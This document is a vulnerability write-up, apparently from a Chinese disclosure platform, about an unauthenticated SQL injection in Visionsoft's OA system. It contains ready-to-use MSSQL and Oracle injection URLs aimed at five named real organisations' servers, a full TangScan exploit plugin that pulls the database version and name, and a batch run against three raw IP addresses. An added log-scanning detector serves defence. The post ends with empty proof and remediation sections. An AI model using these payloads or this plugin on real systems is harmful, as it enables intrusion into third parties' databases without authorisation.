
Generic SQL injection vulnerability in an OA system (written in support of TangScan)


1) Generic SQL injection vulnerability

Vendor: 源天软件 (Visionsoft)

Website: http://www.visionsoft.com.cn/

Vulnerable endpoint: ServiceAction/com.velcro.base.DataAction

Note: this OA system is deployed on two database types, MSSQL and Oracle.

A PoC is given for each of the two database types.

PoC:

MSSQL:

```
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
```

Oracle:

```
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
```

Proof of vulnerability (just open the URL directly):

MSSQL:

A) http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

B) http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

C) http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

Oracle:

D) http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

E) http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
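Because this endpoint takes raw SQL in a request parameter and encodes spaces as `|20`, keyword rules applied to the undecoded query string miss the payloads above. The following is an added example, not code from the original write-up or from TangScan: a small detector that decodes the `sql` parameter the way the endpoint does and flags UNION / version probes in web-server access logs. The endpoint path comes from the write-up; the log lines, client IPs and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# The vulnerable endpoint named in the write-up; the log lines below are constructed.
ENDPOINT = "/ServiceAction/com.velcro.base.DataAction"
# Fragments with no place in the application's own queries: UNION-based extraction
# and the version / database-name probes the PoC relies on.
SUSPICIOUS = re.compile(r"union\s+(?:all\s+)?select|@@version|db_name\s*\(|v_\$version", re.I)
# Combined log format: client - - [time] "METHOD target HTTP/x.y" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_sql_param(raw):
    """Undo percent-encoding, then the OA's own '|20' space encoding seen in the PoC."""
    return unquote(raw).replace("|20", " ")

def extract_sql_param(target):
    """Return the raw `sql` query parameter of a request target, or None if not this endpoint."""
    path, _, query = target.partition("?")
    if path != ENDPOINT:
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")  # the value itself may contain '='
        if key == "sql":
            return value
    return None

def scan_access_log(lines):
    """Return (client_ip, http_status, decoded_sql) for each request that injects into `sql`."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        raw = extract_sql_param(m.group(3))
        if raw is None:
            continue
        decoded = decode_sql_param(raw)
        if SUSPICIOUS.search(decoded):
            hits.append((m.group(1), int(m.group(4)), decoded))
    return hits

# Constructed sample log lines (documentation IPs and timestamps are invented).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2015:10:01:02 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%2742%27&isworkflow=true HTTP/1.1" 200 312',
    '198.51.100.7 - - [22/Jul/2015:10:02:15 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 498',
    '198.51.100.7 - - [22/Jul/2015:10:02:16 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true HTTP/1.1" 200 521',
    '203.0.113.5 - - [22/Jul/2015:10:03:40 +0800] "GET /index.jsp HTTP/1.1" 200 1024',
]
```

The first sample line is a normal-looking lookup and is not flagged; the two UNION probes are. On the application side the only real fix is to stop accepting SQL text from the client at all, since any endpoint that executes a caller-supplied query is injectable by design.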

2) As promised, in support of TangScan

Here is the finished plugin code (I'm no coder, this was thrown together, so experts please go easy on me). By the time this is published, the plugin will already be in the TangScan.com repository.

```python
#! /usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission
author: fate0 <[email protected] >
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit


__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        # Plugin metadata shown by the TangScan framework
        self.info = {
            "name": "源天软件OA办公系统 sql 注入MSSQL版漏洞(无需登录)",
            "product": "源天",
            "product_version": "",
            "desc": """
            OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏
            """,
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [
                {self.ref.wooyun: "暂无"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        # The only option: the target base URL
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })

        # Result structure filled in by verify() / exploit()
        self.register_result({
            "status": False,
            "data": {
                "db_info": {
                    "version": "",
                    "current_db": ""
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The endpoint wraps query results in <data>...</data>
        re_version_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format(
            url=self.option.url,
            db_version=re_result[0]
        )

    def exploit(self):
        self.print_debug("exploit start")

        re_userinfo_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "目标 {url} 存在sql注入, 数据库名称为: {current_db}".format(
            url=self.option.url,
            current_db=self.result.data.db_info.current_db
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
```

Here is what running the plugin produces:

Running --mode verify (the default):

[screenshot: verify-mode output]

Running --mode exploit:

[screenshot: exploit-mode output]

The plugin runs normally and outputs the data without trouble......

This is where it should have ended, but I couldn't help myself, so here are the results of a batch-check script as well.



The sites tested were:

http://60.12.113.234:8080/

http://121.14.195.31:8081/

http://218.246.22.194:8080/

For the test, --mode exploit was run directly to collect the database names in bulk.

[screenshot: batch run output]

After the test, here is the content of the result file success.txt:

[screenshot: success.txt]

Well, this is where it ends...

Proof of vulnerability:

Remediation:
